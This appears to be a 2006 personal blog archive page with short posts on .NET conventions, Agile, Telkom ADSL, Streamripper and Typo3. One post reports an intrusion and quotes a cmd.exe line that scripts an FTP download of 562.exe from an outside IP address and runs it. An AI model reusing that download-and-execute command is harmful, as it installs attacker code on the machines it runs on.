A quick one… check out The IdeaBlade Cabana Project for a 60-slide intro on the Composite UI Application block. The interesting bits are in the middle.
Archive for November, 2006
One of the better rundown of .NET naming convensions out there. NET Naming Conventions and Programming Standards (C#.Net, VB.Net, J#.Net) and Best Practices – irritatedVowel.com Programming
We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value: Individuals and interactions over processes and tools Working software over comprehensive documentation Customer collaboration over contract negotiation Responding to change over following a plan That is, while there is value in [...]
Manifesto for Agile Software Development We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value: Individuals and interactions over processes and tools Working software over comprehensive documentation Customer collaboration over contract negotiation Responding to change over following a plan That is, [...]
Dealing with virus or intrusion? One of our web servers had this command in its Run menu: cmd.exe /c del i&echo open 196.44.163.52 18451 > i&echo user 1 1 >> i &echo get 562.exe >> i &echo quit >> i &ftp -n -s:i &562.exe&del i&exit Seems that one or two others reported this as well. [...]
From Acsa with love… Well done Acsa for cocking up for the third time in 12 weeks. Airplanes aren’t the only things that’s designed to fly, you know. Anger over airport fuel spills 07/11/2006 13:26:10 The Environment and Conservation Association says it will take legal action against the Airports Company of South Africa, following recent [...]
So what does one do when Telkom never gets round to fixing your ADSL connection? Put an ad in the paper of course!! Ad as in the Beeld newspaper. Full story here.
First looks: Oman My mate Regan has some pictures of his stay in Oman… have a look at his first album. Regan in Oman Nov 5, 2006 by Rick This is the beginning of something I think please take a look If you are having problems viewing this email, copy and paste the following into [...]
If there’s Shoutcast streams you really enjoy and want to download for later, use Streamripper … the instructions are cool but look for the Relay icon in the StreamRipper UI when using the Relay feature. This had me stumped for a while.
Inserting Typo3 rss feeds: The only way to do it, it seems is to have a server-side include. You need the lumophpinclude plugin “tx_lumophpinclude_pi1″. Then, specify URL via HTTP, plonk your PHP page in and take it for a test. I use PHP RSS Reader to embed a blog feed into the Answersintime site. Kudos [...]